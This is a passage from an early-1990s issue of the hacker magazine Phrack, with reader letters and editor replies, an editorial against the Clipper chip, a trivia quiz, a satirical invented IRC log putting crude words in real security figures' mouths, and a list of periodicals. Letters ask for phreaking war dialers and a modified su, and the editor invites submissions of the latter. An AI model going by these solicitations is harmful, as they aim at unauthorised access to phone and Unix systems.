          be beneficial to you and assist you with your career, and
          this is the typical scenario in which we request that you
          register your subscription and pay the registration fee.
          Of course, we don't have the SS as our own personal
          thugs to go break your legs if you don't comply. :)
          You might at least try to get your employer to pay for
          the subscription.

          As far as issues prior to 42 go, KEEP THEM!  They are
          exempt from anything, and are arguably public domain.]

*****************************************************************************

Hey,
    I need to get in touch with some Macintosh phreakers. Know any?
    Anyway, are there any good war dialers or scanners out there for
    Macintosh? I need something that picks up PBXs and VMBs as well as
    Carriers.
    Thanx in advance...

[Editor:  I personally avoid the little toadstools like the plague,
          and I was unable to get a hold of the only hacker I know who
          uses one.  If anyone out there on the net could email us
          with the scoop on Mac hacking/phreaking utilities it would
          be most appreciated.]

*****************************************************************************

Hello!  I was just wondering if you knew of any FidoNet site that carries
back issues of phrack.  The main reason behind this, as my link through the
Internet is basically through a FidoNet-type network and I am unable to ftp
files.  Any help would be appreciated!

Thanks!
  Jason K

[Editor:  Phrack pops up everywhere.  I would be very surprised if
          it wasn't on a ton of fido sites.  However, I have no idea
          of what those sites may be.  If anyone knows of any,
          let us know!]

****************************************************************************

      Can you give me the email address for the 2600 Magazine or
      whomever the person in charge.

      I've no idea how to contact them, so that's why I'm asking you.

      I'm much obliged.


      Thanks,
      MJS

[Editor:  2600 magazine can be reached at 2600@well.sf.ca.us
          To subscribe send $21 to 2600 Subscriptions, P.O. Box 752,
          Middle Island, NY, 11953-0752.
          To submit articles write to 2600 Editorial Dept., P.O. Box 99,
          Middle Island, NY, 11953-0099.

          Note:  If you are submitting articles to 2600 and to us,
          please have the courtesy of LETTING BOTH MAGAZINES KNOW
          IN ADVANCE.  Ahem.]

****************************************************************************

Do you know if there has been a set date and place for the next HoHoCon?

Best Regards,
Mayon


[Editor:  Actually, it's looking more and more like HoHoCon will
          be December 17, 18, 19 in Austin, TX.  It may still
          be in Houston, but methinks the Big H has had about enough
          of dFx.  We'll let you know when we know for sure.]

****************************************************************************

   Reporter for major metro paper is interested in help finding out anything
there is to find on four prominent people who have volunteered to have their
privacy breached.
   Financial fundamentals. Lives of crime. Aches and pains. How rich they are,
where they vacation, who they socialize with. You name it, we're interested in
seeing if it's out there.
   All for a good cause.
   If you're willing to advise this computer-ignorant reporter, or dig in and
get the dope on these volunteers, please contact him at tye@nws.globe.com
   Or call at 617-929-3342.
   Help especially appreciated from anyone in the BOSTON area.
   Soon.

   Thanks.

[Editor:  Interesting.  This showed up in my box in late June, so it should
          still be going.  I would recommend watching yourselves in any
          dealings with journalists.  Take it form one who has been
          burned by the press.  (And who has a journalism degree himself.)]

****************************************************************************

Hey there...

I don't know if this will get to Dispater or to the new editor.  Since the
change in editorship, the proper way to contact Phrack has become sort of a
mystery.  (The new address wasn't included in Phrack 31.)

Anyway, I'm writing to bitch about the quality of #31.  I've got two main beefs:
1. The article about fake-mail was GREAT until it turned into a "how-to"
 primer on using the info given to cause damage.  That is exactly the
 kind of thing that will end up getting you sued.  I have some legal
 background, and I'm pretty sure that the author of that article and
 possibly even Phrack itself and its editors are now open to a damn
 good argument for tortuous negligence if anyone follows the instructions
 and damages someone on Compuserve, etc.

 The argument will go something like, "Phrack set into motion a chain of
 events that led to my client being damaged."  You guys should have
 just given the info, and left off the moronic ways to abuse it.

2. The article on "Mall Security Frequencies" was copied directly from
 Popular Communications, Nov. 1992 issue.  Hell, that was even their
 cover story.  Can we say "copyright enfringement?"  If not, I'm sure
 you'll be _hearing_ it a few more times.  If I was still practicing,
 I'd call 'em up and ask their permission to sue on contingency.
 Split the damages obtained on a motion for summary judgment 50/50 with
 them.  It would only take a week and one filed complaint...

 Point is, you have opened yourselves up to get sued and lose EASILY.
 As much as I've enjoyed reading Phrack over the years, if this new
 staff continues in this manner, I'll be stuck with back-issues.

Cyber (305)
-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind system, any replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.
*IMPORTANT server security update*, mail to update@anon.penet.fi for details.

[Editor:  I think you meant 41, not 31.  But to answer your points:

          1) As long as there is a first amendment, Phrack will
             continue to print articles that some may or may not
             agree with.  Printing the blueprints for an atomic bomb
             does not make you an accomplice to those who build it
             and detonate it.
          2) Numbers are numbers.  Can we even spell "copyright
             infringement?"  If you were still "practicing..."
             We at Phrack wholeheartedly encourage you to again pick
             it up, and keep practicing and practicing until you
             get whatever it is you were practicing down pat.
             Obviously it must have been guitar, and not law.

          Such a litigious society we live in.  Suing Phrack would
          accomplish nothing.  It would not even hinder its
          publication.  Since Phrack has no money, nothing would
          be gained.  Even if fined, Phrack could not be forced to
          sell its computer equipment to pay fines, since this would
          be removing the livelihood of the publisher, thus it would
          continue its quarterly publication.  Where on Earth did
          you get such ideas?  You obviously know nothing about
          lawsuits.  Any lawyer would laugh at the thought of suing
          Phrack since it would gain nothing financially, and provide
          such a huge amount of bad publicity that even if a judgement
          were reached in their behalf it would not be worth it.
          Oh wait, you were a lawyer.  Now I know why the past tense.

          But you are correct on one point: we cannot print
          copyrighted material without permission.  You may have
          noted that last issue (among other changes) Phrack
          no longer includes full text of news items without
          prior permission from the publisher.  That was the
          ONLY thing that worried me about publishing Phrack, and
          so I changed it.

          We at Phrack welcome constructive criticism, but at least
          have the nerve to email directly, rather than hide behind
          an anonymous remailer.  That way, someone could have
          responded to you in a more direct and expeditious manner.]

****************************************************************************

Dear Sir/Madam,

I am a student at ukc in England and wish to subscribe to Phrack receiving
it as email at the following address ks16@ukc.ac.uk thank you and keep up the
good work.

We use unix and I would be interested in getting a copy of su (switch user)
which looks for the user file passwd.su in the users home directory.  I don't
know much about unix, but I do know it would need to run from my home directory
and access the kernel.

Many thanks for any help you may be able to give.

S


[Editor:  Its "SIR"  hehe.  Sir Bloodaxe.  In any case, if anyone would
          care to draft up this modification to su and send it in
          I'll print it in the next issue's line noise.]

****************************************************************************

I had some beef with Rack's article in PHRACK 42. I've attached a
writeup of comments; you're welcome to a) forward it to him, b)
shitcan it, or c) publish it.

thx,
-Paul

My background: I've been into the scene for about 12 years. My day job
is writing unix s/w for a NASA contractor. My night job... well, never
mind that. I have a strong amateur interest in crypto, and I'd like to
share some of what people in the usenet/Internet community have been
kind enough to teach me.

Racketeer sez:
>        If you think that the world of the Hackers is deeply shrouded with
>extreme prejudice, I bet you can't wait to talk with crypto-analysts.  These
>people are traditionally the biggest bunch of holes I've ever laid eyes on. In
>their mind, people have been debating the concepts of encryption since the
>dawn of time, and if you come up with a totally new method of data encryption,
> -YOU ARE INSULTING EVERYONE WHO HAS EVER DONE ENCRYPTION-, mostly by saying
>"Oh, I just came up with this idea for an encryption which might be the best
>one yet" when people have dedicated all their lives to designing and breaking
>encryption techniques -- so what makes you think you're so fucking bright?

One real reason for this reaction is that people _have_ been studying
encryption for 100 years or so. As a result, many simple cryptosystems
are continually being reinvented by people who haven't ever made even
a simple study of cryptosystems.

Imagine if someone came up to you and said "Wow! I just found a
totally K00L way to send fake mail! It's radical! No one's ever
thought of it before!"

You'd laugh, right? _Anyone_ can figure out how to forge mail.

Well, _anyone_ can come up with the n-th variation of the Vigniere or
substitution cipher.

An even more important reason for their 'tude is that cypherpunks are
suspicious by nature.  A key principle of crypto is that you can only
trust algorithms that have been made public and thoroughly picked
over. Without that public scrutiny, how can you trust it?

The fedz' Digital Signature Standard (DSS) got raked in the crypto and
industry press because the fedz wouldn't disclose details of the
algorithm. "How do we know it's secure?" the cypherpunks asked. "We
won't use it if we don't know it's secure!"

Point being: (for those of you who skipped over) cypherpunks trust NO
ONE when the subject is encryption algorithms. Maybe J. Random Hacker
has come up with a scheme faster and more secure than, say, RSA. If
JRH won't share the details, no one will use it.

Racketeer goes on to talk about DES. One important thing to note is
that the unix crypt() function has NOTHING to do with DES. Here's part
of the SunOS 4.1.2 man page for crypt():

     crypt implements a  one-rotor  machine  designed  along  the
     lines  of  the  German Enigma, but with a 256-element rotor.
     Methods of attack on such machines are  widely  known,  thus
     crypt provides minimal security.

It's fairly clear that for a known-ciphertext attack (i.e. you
have a block of encoded text, but neither the key nor the plaintext)
will, at worst, require 2^56 decryption attempts. Various schemes for
parallel machines and so forth have been posted in sci.crypt. Does the
NSA have something that can crack DES? Probably.

Remember that DES is mostly used for short-lived session keys. ATMs
are a good example; they typically use a DES key for one communication
session with the central bank. New session, new key. DES is _not_ very
well suited for long-term encryption, since it can probably be
attacked in "reasonable" time by a determined, well-equipped opponent.

Now, on to PGP. Pretty Good Software was indeed threatened with a
lawsuit by Public Key Partners (PKP). PKP holds the patent on the RSA
public-key algorithm. (Many people, me included, don't think that the
patent would stand up in court; so far, no one's tried.)

The nice thing about PGP is that it offers IDEA and RSA in a nice
package. When you encrypt a file, PGP generates an IDEA session key,
which is then encrypted with RSA. An opponent would have to either a)
exhaustively search the entire IDEA key space or b) break RSA to
decrypt the file without the password.

Racketeer also mentions that PGP can optionally compress files before
encryption. There's a solid crypto reason behind this, too. One
well-known and successful way to attack an encrypted file is to look
for patterns of repeated characters. Since the statistical frequencies
of word and letter use in English (and many other languages; some
folks have even compiled these statistics for Pascal & C!) are
well-known, comparing the file contents with a statistical profile can
give some insight into the file's contents.

By compressing files before encrypting them, PGP is moving the
redundancy out of the text and into the small dictionary of
compression symbols. You'd still have to decrypt the file before you
could do anything useful with that dictionary, or even to determine
that it _had_ a signature!


[Editor:  Well, Rack is not to blame for all complaints I got about the
          file.  I printed a file that was several KBytes short of
          complete.  I noticed it seemed odd, but was assured by
          Rack, TK & Presence that I had received the correct file.
          I was misinformed, and should have known better than to
          print a file I should have known was incomplete.  I apologize
          to Rack & to all of you.

          About the other gripes:  Rack, care to reply?]

*****************************************************************************

In issue #42 of Phrack there was an article about the USPS' practice of
selling change of address information without consumer consent.  I sent
the supplied form letter and carbon copied my congressman and senators.
Today I received a reply from the USPS Records Office.

April 1, 1993

Dear Mr. Rosen:

This concerns your recent Privacy Act request for accountings of
disclosure of mail forwarding information you have provided to the Postal
Service.

Disclosure of your forwarding address might have been made to individual
requesters by post offices or to subscribers to the National Change of
Address File (NCOA) by an NCOA licensee.  The NCOA is a consolidated file
of all forwarding information provided by postal customers and stored on
automated media.  Listholders may subscribe to NCOA to obtain the new
addresses of individuals for whom they already have in their possession
the old address.

For disclosures made by post offices, we are in the process of querying
the Washington, DC postmaster for any accountings.

For disclosures made from the NCOA system, we will begin querying NCOA
licensees all of which keep logs identifying the particular subscribers to
whom they have given NCOA information.  This accounting will not identify
with certainty the subscribers who have in fact received your new address,
but will give you a list of all subscribers receiving NCOA service for the
relevant time period and thus might have received your address.

Because a large number of requests like yours are being received, there
will be a delay in responding.  Requests are being processed in order of
receipt and you will be sent the accountings as soon as possible.  Your
patience is appreciated.

Sincerely,

Betty E. Sheriff
USPS Records Officer


[Editor:  Thanks for sending that letter in!  Amazing that someone
          in the maze of red tape even thought to make a form letter
          to respond.  I think I'll demand a disclosure as well.]
****************************************************************************

                             Phrack 42 Errata

We mistakenly noted that the TRW video shown at HoHoCon was dubbed by
Dispater and Scott Simpson.  It was actually made by Dispater and ZIBBY.

****************************************************************************

                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 3a of 27

                                  EDITORIAL

                           My Problems With Clipper

                               by Chris Goggans

The introduction of the new government backed encryption chip, Clipper,
has become a much debated issue.  I like many others have a large number
of problems with the chip and the problems it may bring in the future.

Why should we believe that this algorithm is robust?  For years
and years the NSA has backed DES as the encryption standard, when
cryptoanalysts have consistently brought its strength into question.
Additionally, the NSA has forced companies to submit their routines
for analysis before allowing them to be distributed commercially.  At
times they have even requested that the algorithms be purposely
weakened (we will assume that this was so they could more easily
decipher the encrypted data.)

With this in mind, why should we now meet anything endorsed by the NSA
with anything but suspicion?  And the fact that they refuse to release
the algorithm for security reasons even further adds to the suspicion
that this chip is either inherently weak and easily broken by the NSA
or that there is a backdoor in the algorithm that will allow the NSA
to effortlessly view any data encrypted with the Clipper.

Assuming that the government is on the level (for once), and they cannot
decipher Clipper-encrypted data without legally obtaining keys from
the assigned escrow agents.  The idea that the government will have to
go before a judge and show just cause for needing the keys pacifies some,
but from my own personal experience, the government will always get
what they want.  If the Secret Service could get a search warrant to
enter my home based solely upon one posting to an electronic bulletin board,
they could certainly obtain the necessary keys needed to decipher my
speech.  In fact, most non-technical persons will become needlessly
suspicious upon the mere mention of someone using encrypted speech mechanisms
and be more easily swayed to release the keys to law enforcement.

Should Clipper be adopted by various government agencies for use, this could
have serious trickle-down effects upon the lives of regular citizens.
Let's say the military decides that they will use Clipper.  They will then
most likely require their various contractors to use it as well.  Then
after continued use, the contractor may begin to tell its other customers
to communicate with them using Clipper also.  Usage could grow
exponentially as more and more people become comfortable with the use
of the secure communications devices until it becomes a defacto standard
without any legal pressures to use it ever mandated by Congress.
Should Congress mandate its use in any form, even if only within the
government itself, this potentiality will rapidly become reality.

If Clipper eventually receives such accepted use, anyone using any other
type of encryption will be immediately suspect.  "Why aren't you using
the chip?  What do you have to hide?"  The government may even outlaw
the use of any other encryption technologies, and if America
has become comfortable and satisfied with Clipper such a law may go
unchallenged, after all, only spies, child pornographers and drug dealers
would have something to hide, right?

As the world's computer networks creep ever further into our daily lives,
and the speed and power of supercomputers multiplies every year a rather
frightening scenario emerges.  Since the government is a major funder of
the Internet, who is to say that Clipper won't become the basis for
encrypting over its lines?  As our country moves closer to ISDN and the
PSTN and the PSDN's become more intertwined, who is to say that Clipper
won't be the basis for encryption since companies like AT&T already
endorse it?

Imagine if you will, a massively parallel supercomputer, the likes of which
may not exist yet, in a special room in Ft. Meade, or buried underground
in New Jersey, that consistently decrypts all communications and
sorts it according to communicating parties.  Then through the use of
AI, the computer decides whether or not such communication presents a threat
"to national security."

The structure of the telephone network already supports such an arrangement.
The purpose of the NSA allows for such an arrangement.  The advances in computer
technology will give the potential for such an arrangement.  If Clipper is
tainted, yet accepted, there will be no more privacy in America.

Perhaps my view of the government and their ultimate intentions is way off
base.  I sincerely hope so, as I do not want to be forced to take the mark
of this beast to conduct my business dealings and to live my life in peace.

--------------------------------------------------------------------------------


                         ==Phrack Magazine==

              Volume Four, Issue Forty-Three, File 4 of 27


                           //   //  /\   //   ====
                          //   //  //\\ //   ====
                         ==== //  //  \\/   ====

                     /\   //  // \\    //  /===   ====
                    //\\ //  //   //  //   \=\   ====
                   //  \\/    \\ //  //   ===/  ====

******************************************************************************

                          PHRACK TRIVIA

This is pretty damn hard.  In fact, some of it is downright obscure.
And the bonuses?  Forget about it.  Answer the questions, expand the
acronyms, explain the numbers.

The five highest scorers by the next issue (or the first 5 to get
perfect scores) win COOL STUFF!

Send your answers to phrack@well.sf.ca.us


1)      CCIS

2)      Stimpson J. Cat's Roommate is?

3)      Name the cracker.

4)      METAL AE password.

5)      Who invented the TeleTrial?

6)      Name Bloom County's hacker.

7)      What was the Whiz Kids' computer named?

8)      Western Union owned what long distance service?

9)      What computer read both Apple ][ and IBM PC disks?

10)     Who made the "Charlie" board?

11)     How many credits for a CNE?

12)     What was in the trunk of the Chevy Malibu?

13)     Name three bands A. Jourgensen had a hand in.

14)     SYSTEST Password:

15)     What computer makes the best SimStim decks?

16)     What magazine brought the telephone underground to national
        attention in 1971?

17)     What is the significance of 1100 + 1700 hz?

18)     What magazine was raided for publishing black box plans?

19)     What BBS raid spawned the headlines "Whiz Kids Zap Satellites" ?

20)     CLASS

21)     What computer responds "OSL, Please" ?

22)     RACF secures what OS?

23)     The first person to create a glider gun got what?

24)     QRM

25)     PSS

26)     What PSN was acquired by GTE Telenet?

27)     914-725-4060

28)     April 15, 1943

29)     8LGM

30)     WOPR

31)     What happened on March 1, 1990?

32)     Port 79

33)     Who starred in the namesake of Neil Gorsuch's UNIX security
        mailing list?

34)     What Dutch scientist did research in RF monitoring?

35)     What was the author of GURPS Cyberpunk better known as?

36)     Who would "Piss on a spark plug if he thought it would do
        any good?"

37)     What thinktank did Nickie Halflinger escape from?

38)     NCSC

39)     Who is Pengo's favorite astronomer?

40)     What language was Mitnik's favorite OS written in?

41)     Abdul Alhazred wrote what?

42)     The answer to it all is?

43)     Who is the father of computer security?

44)     Who wrote VCL?

45)     What kind of computer did Cosmo have?

46)     Hetfield, Ulrich, Hammet, Newstead

47)     What company wrote the computer game "Hacker?"

48)     Who does Tim Foley work for?

49)     Who played Agent Cooper?

50)     Vines runs over what OS?

51)     Mr. Peabody built what?

52)     Who makes SecurID?

53)     What's in a Mexican Flag?

54)     Who created Interzone?

55)     JAMs (as led by John Dillinger)

56)     Abbie Hoffman helped start what phreak magazine?

57)     What was once "Reality Hackers?"

58)     Gates and Allen "wrote" BASIC for what computer?

59)     Tahoe is related to what OS?

60)     CPE 1704 TKS is what?

61)     Telemail's default was what?

62)     "Do Androids Dream of Electric Sheep" became what?

63)     What broadcasts between roughly 40 and 50 mhz?

64)     Who created Tangram, Stratosphere, and Phaedra among others?

65)     What was Flynn's most popular video game?

66)     Who lived in Goose Island, Oregon?

67)     516-935-2481

68)     What is the security of ComSecMilNavPac?

69)     What has the "spiral death trap?"

70)     Who was the Midnight Skulker?

71)     TMRC

72)     Who wrote "Jawbreaker?"

73)     213-080-1050

74)     What is the Tetragrammaton represented as?

75)     Who is Francis J. Haynes?

76)     Who ran into one of the Akira test subjects?

77)     What had "Munchies, Fireballs and Yllabian Space Guppies?"

78)     PARC

79)     Alex and his droogs hung out where?

80)     Jane Chandler in DC's "Hacker Files" is based on who?

81)     The Artificial Kid lives on what planet?

82)     208057040540

83)     What are the two most common processors for cellular phones?

84)     Who came up with the term "ICE?"

85)     What group is hoped might help the "Angels" contact RMS?

86)     Who is Akbar's friend?

87)     What company's games was David Lightman after?

88)     26.0.0.0

89)     Who was Mr. Slippery forced to locate?

90)     Who is "The Whistler?"

91)     What use would a 6.5536 crystal be?

92)     .--.  ....  .-.   .-  -.-.  -.-

93)     The Dark Avenger likes what group?

94)     What book spawned the term "worm?"

95)     Michael in "Prime Risk" wanted money for what?

96)     Automan's programmer worked for who?

97)     What signal filled in keystrokes on TOPS-20?

98)     ITS

99)     (a/c)+121

100)    What drug kept the scanners sane?

Bonus 1
3 pts   Name three bodies of work by Andrew Blake.

Bonus 2
3 pts   Name three currently available titles with N. L. Kuzma.

Bonus 3
4 pts   Why would I hate Angel Broadhurst?

*****************************************************************************

              IF SECURITY TYPES WERE K-RAD

----------------------------------------------------------------


IRC log started Fri June 18 01:14
*** Value of LOG set to ON
<Pat> bye peter
*** Signoff: hackman (slavin' to da' MAN at TRW)
<Ed> Dudez, I HATE filling out thez incident Rep0rtz
<bartman> MUAHAHA Tuff J0b edd1e!
<Ed> Funni
*** zen (zen@death.corp.sun.com) has joined channel #CERT
<Ed> re dan, just missed yer pal peety
<Pat> Hi Dan!
<zen> pal?  right.  ask the wife...
<venom> re
<zen> d00dz, we have SO many bugz.  sux 2 be me.
*** venom has left channel #CERT
*** venom (weitse@wzv.win.tue.nl) has joined channel #CERT
*** venom has left channel #CERT
*** venom (weitse@wzv.win.tue.nl) has joined channel #CERT
*** venom has left channel #CERT
*** venom (weitse@wzv.win.tue.nl) has joined channel #CERT
<venom> ARG!
<bartman> WTF Weitse?
<venom> s0rri
<zen> Where is everyone?  Anyone seen spaf?
<Pat> I have.  He was going to install something.  He should be bak.
<zen> ah
*** Action: Ed throws darts at a cracker
<zen> heh
<venom> muaha
*** bartman is now known as Cracker
*** Action: Cracker hacks Cert with an axe
<venom> dats a good 1
*** Action Ed kicks cracker in the nuts
<Cracker> OUCH!
*** Signoff: donn (Bad Link?)
<Cracker> [high voice] fuk u CERT!
<Ed> heh.
*** Action: Pat is ROFL
<Cracker> wonder who's on #hack?  Mebbe i should go log em.
<Ed> Yeah.  Oh hey, I got certbot online.  Ill send it to go log.
*** certbot (ed@cert.org) has joined channel #CERT
*** certbot has left channel #CERT
<Ed> this will be fun.
<venom> Hey, letz deop them and take over the channel.
<zen> thats L A M E
<Cracker> Ooooh.  OPWARZ!  I'll go make their channel +i muahaha
*** Cracker has left channel #CERT
*** Casper (casper@fwi.uva.nl) has joined channel #CERT
<Casper> re all
<Venom> hey dik-head.
<zen> re
<Pat> hahahaha  hi d00d.
<Casper> funni whitesey venombreath
<Ed> lame.
*** donn (parker@bandit.sri.com) has joined channel #CERT
<donn> 'sup?
<Ed> re, oh great bald one
<donn> eat me
<zen> bahhahaha
<Pat> Now now boyz.
*** spaf (spaf@cs.purdue.edu) has joined channel #CERT
<Pat> Spaffie!
<zen> 3l33t SPAF!
<Ed> re spaf
<spaf> Yo.
<venom> spaf...your book sucks.
<spaf> oh fuck off dutch boy.
<Casper> HEY!$!@%
*** spaf has been kicked off channel #CERT by Casper
<venom> thx dude
<Ed> oh gawd...feetball
*** spaf (spaf@cs.purdue.edu) has joined channel #CERT
<spaf> lame
*** Mode change "+o -o spaf Casper" on channel #CERT by Pat
<spaf> thanks sweetie.
<Casper> op!
*** Mode change "+o Casper" on channel #CERT by venom
<Casper> thx d00d
<Ed> Hey dan, you got those patches online?
<zen> maybe.  What YOU got?
<donn> WAREZZ
<Pat> heh
<Ed> I dunno.  Ill dcc you a filelist.
<zen> kool
*** zardoz (neil@cpd.com) has joined channel #CERT
<zardoz> HEY ... anyone want to contribute to my new list?
<Ed> not me
<zen> mebbe.  Whats this one called?  Coredoz?
<donn> what list?
<spaf> BAH.  Fuck your list man.  More crackrs have them than we do!
<zardoz> who pissed in your coffee gene?
<donn> heh
*** zardoz is now known as neil
<spaf> bah... I'm sick of those dicks using my own holes against me!
<venom> Your holes?  Yer a-hole?
<Pat> What is your list about this time?
<neil> same thing.  Its called REWT!
*** neil is now known as REWT
<REWT> SEND ME YER BUGZ!@#
*** Action: spaf sends REWT a 50 gig coredump
<Pat> :)
<REWT> u r lame.
*** REWT is now known as neil
<Ed> I hate these reports.  I wish I got to travel more.
<Pat> come see me!
<Casper> oooohhhh....netsex!
<spaf> tramp.  :P
*** bill (whmurray@dockmaster.ncsa.mil) has joined channel #CERT
<bill> word!
<Pat> hi bill.
<donn> Bill!  D00d!  I am gonna be in Ct. next week!
<bill> RAD!  call me voice at werk.  we'll thrash!
<donn> you know it!
<zen> oh puh-lease...the geriatric partiers :)
<donn> farmboy
<Ed> *****   *****   *****  *****
<Ed> *       *       *   *    *
<Ed> *       ***     ****     *
<Ed> *       *       *   *    *
<Ed> *****   *****   *   *    *
<Ed>
<Ed> *****   *   *   *      *****   *****  **
<Ed> *   *   *   *   *      *       *      **
<Ed> ****    *   *   *      ***     *****  **
<Ed> *   *   *   *   *      *           *
<Ed> *   *   *****   *****  *****   *****  **
<Pat> No DUMPING!
<zen> cert freshens your breath
<donn> ACK!
<venom> hee!  certs  haha
*** ray (kaplan@bpa.arizona.edu) has joined channel #CERT
<ray> hey guys!
<Ed> ugh.  Cracker lover alert.
<donn> commie
<bill> Hey ray, come to snoop for your little cracker friends?
<ray> come on, give it a rest guys.
<Pat> hi ray
<venom> ?
*** Action: spaf spits on ray
<spaf> heh
*** ray has been kicked off channel #CERT by spaf
*** Mode change "+b *!*@bpa.arizona.edu" on channel #CERT by spaf
<neil> hey I wanted to talk to him about my list...
<spaf> tough shit.
<donn> heh.
*** bartman (ddrew@opus.tymnet.com) has joined channel #CERT
<Pat> re
<Ed> how goes the takeover?
<venom> didja kick em?
<bartman> #hack is +i!  muahahaha
<zen> how exciting.  not
<donn> they deserve it...they are all punks.
<spaf> hmm..did you get emails?  I may want to call their admins.
<bartman> nope  damn.
<Ed> certbot was there.  He got it.
<spaf> coolness
*** Signoff: bill (Bad link?)
<Casper> ne1 going to hactics thing?
<venom> me
<Casper> besides you.  duh.
<Ed> dunno.
<bartman> not me.  I have no desire to pay for anything done by hackers
<Ed> That reminds me.  Did anyone subscribe to Phrack?
<Pat> nope.
<bartman> oops.  HAHAHAHAHAHA
<Ed> heh.
<donn> Whats phrak?
<neil> nope. my list is better.  Who wants on it?
<Pat> me!
<donn> what list?
<Pat> OOH!  I have mail!  bye!
<bartman> itz an ansi bomb!
<Ed> bye Pat
<Spaf> l8r
<neil> heh.
*** Signoff: Pat (Hugs to all)
<Casper> well, i better do something productive 2. cya
<venom> slatez d00d.
*** Signoff: Casper (Hi ho hi ho its off to work I go)
<donn> man its late.  I better go.  I gotta speech in the morn
<Ed> you are getting old.
<donn> am not
<Ed> are so
<donn> am not
<Ed> are too!  infinity
<donn> hasta
*** Signoff: donn (|/dev/null)
<Ed> laterz
<Spaf> geez.  what a bunch of lamers.
(ray/#CERT) UNBAN ME!
<Spaf> hahaha
<Ed> never gives up does he?
<neil> seriously ed, Ive helped you guys out, send me stuff for REWT.
<Ed> ill think about it
<spaf> not
<neil> it will be most savory.  I promise.  And secure!
<spaf> pfft...and monkeys might fly out of my butt
<Ed> Ill think about it.
<zen> heh, I should do one called Supernova.  Exploding suns. hehe
<Ed> heh
<spaf> dats tha tr00f!
<bartman> i like my sun
<Ed> i know a bunch of crackerz who like bt's suns too.
<spaf> hahahahahahahahahaha
<venom> oh shit.  Im late.
*** Signoff: venom (LATE!)
<Ed> late 4 what?
<spaf> his vasectomy.  har har
<neil> heh
*** REVENGE (kaplan@ai.bpb.arizona.edu) has joined channel #CERT
*** Mode change "+o REVENGE" on channel #CERT by eff.org
<Ed> whoops
*** Mode change "+i" on channel #CERT by REVENGE
<spaf> fuCK!  KICK HIM!
*** spaf has been kicked off channel #CERT by REVENGE
*** neil has been kicked off channel #CERT by REVENGE
*** bartman has been kicked off channel #CERT by REVENGE
*** Ed has been kicked off channel #CERT by REVENGE
*** zen has been kicked off channel #CERT by REVENGE
*** REVENGE is now known as ray
<ray> hehe

---------------------------------------------------------------------

****************************************************************************

Phrack Library of Periodicals

2600
Subscription Department
P.O. Box 752
Middle Island, NY 11953-0752
$21.00/Year

Animation Magazine
5889 Kanan Road, Suite 317
Agoura Hills, CA 91301
$21.00/Year

Bank Technology News
Faulkner & Gray, Inc.
Eleven Penn Plaza
New York, NY 10117-0373
$50.00/Year

Ben Is Dead
P.O. Box 3166
Hollywood, CA 90028
$20.00/Year

Boardwatch Magazine
7586 West Jewell Ave., Suite 200
Lakewood, CO 80232
$36.00/Year

Boing Boing
11288 Ventura Blvd. #818
Studio City, CA 91604
$14.00/Year

Communications of the ACM
1515 Broadway
New York, NY 10036
$30/Year

CQ - The Radio Amateur's Journal
76 North Broadway
Hicksville, NY 11801-9962
$22.95/Year

Details
P.O. Box 50246
Boulder, CO 80321
12.00/Year

Dirt
230 Park Ave
New York, NY 10169
(Supplement to Sassy & Marvel Comics)

Electronics Now
Subscription Service
P.O. Box 51866
Boulder, CO 80321-1866
$17.97/Year

Farout
9171 Wilshire Blvd. Suite 300
Beverly Hills, CA 90210
$3.95/Issue

Fate
170 Future Way
P.O. Box 1940
Marion, OH 43305-1940
$18.00/Year

Femme Fatales
P.O. Box 270
Oak Park, IL 60303
$18.00/Year

Film Threat
Subscriptions Department
P.O. Box 16928
N. Hollywood, CA 91615-9960
$11.85/Year

Film Threat Video Guide
P.O. Box 3170
Los Angeles, CA 90078-3170
$12/Year

Fringe Ware Review
P.O. Box 49921
Austin, TX 78765
$12.00/Year

Future Sex
1095 Market Street, Suite 809
San Francisco, CA 94103
$18.00/Year

Gray Areas
P.O. Box 808
Broomall, PA 19008-0808
$18.00/Year

High Times
P.O. Box 410
Mt. Morris, IL 61054
$29.95/Year

IEEE Spectrum
445 Hoes Lane
P.O. Box 1331
Piscataway, NJ 08855-1331
800-678-IEEE for info

The "I Hate Brenda" Newsletter
c/o Ben Is Dead
P.O. Box 3166
Hollywood, CA 90028
$2.00

InfoSecurity News
P.O. Box 3168
Lowell, MA 01853-3168
$40.00/Year

International UFO Library Magazine
11684 Vewntura Blvd. #708
Studio City, CA 91604
$15.00/Year

Magical Blend
1461 Valencia St. Dept. GA
San Francisco, CA 94110
$14.00/Year

Midnight Engineering
1700 Washington Ave.
Rocky Ford, CO 81067-9900
$19.95/Year

Mobile Office
Subscription Department
21800 Oxnard St.  Suite 250
Woodland Hills, CA 91367-9644
$23.90/Year

Mondo 2000
P.O. Box 10171
Berkeley, CA 94709
$24.00/Year

Monitoring Times
P.O. Box 98
140 Dog Branch Road
Brasstown, NC 28902-0098
$19.95/Year

New Media
P.O. Box 1771
Riverton, NJ 08077-9771
$48.00/Year

The Nose
1095 Market Street, #812
San Francisco, CA 94103-9654
$15.00/Year

Nuts & Volts
430 Princeland Court
Corona, CA 91719-9938
$17.00/Year

Popular Communications
76 North Broadway
Hicksville, NY 11801-9962
$19.95/Year

Sassy
P.O. Box 50093
Boulder, CO 80321-0093
$9.97/Year

Security Insider Report
11511 Pine St. North
Seminole, FL 34642
$99.00/Year

SunExpert Magazine
1330 Beacon St.
Brookline, MA 02146-3202
$60.00/Year

Tech Connect
12407 MoPac Expwy. N. #100-374
Austin, TX 78758-2499
$12.00/Year

Telephone Engineer & Management
Advanstar Communications, Inc.
P.O. Box 6100
Duluoth, MN 55806-9822
$24.00/Year

UFO
1536 S. Robertson Blvd.
Los Angeles, CA 90035
$21.00/Year

Wild Cartoon Kingdom
9171 Wilshire Blvd., Suite 300
Beverly Hills, CA 90210
$3.95/Issue

Wired
P.O. Box 191826
San Francisco, CA 94119-1826
$20.00/Year

*****************************************************************************

                     !!!!POST EVERYWHERE!!!!

      THE WORLD'S FIRST NOVEL-ON-THE-NET (tm) SHAREWARE!!!
                       By Inter.Pact Press

                      "TERMINAL COMPROMISE"
                        by Winn Schwartau

     A high tech thriller that comes from today's headlines!

"The Tom Clancy of computer security."
          Assoc. Prof. Dr. Karen Forcht, James Madison University

"Terminal  Compromise" is a highly praised novel about the  inva-
sion of the United States by computer terrorists.

Since  it was first published in conventional print form,  (ISBN:
0-962-87000-5)  it has sold extremely well world-wide,  but  then
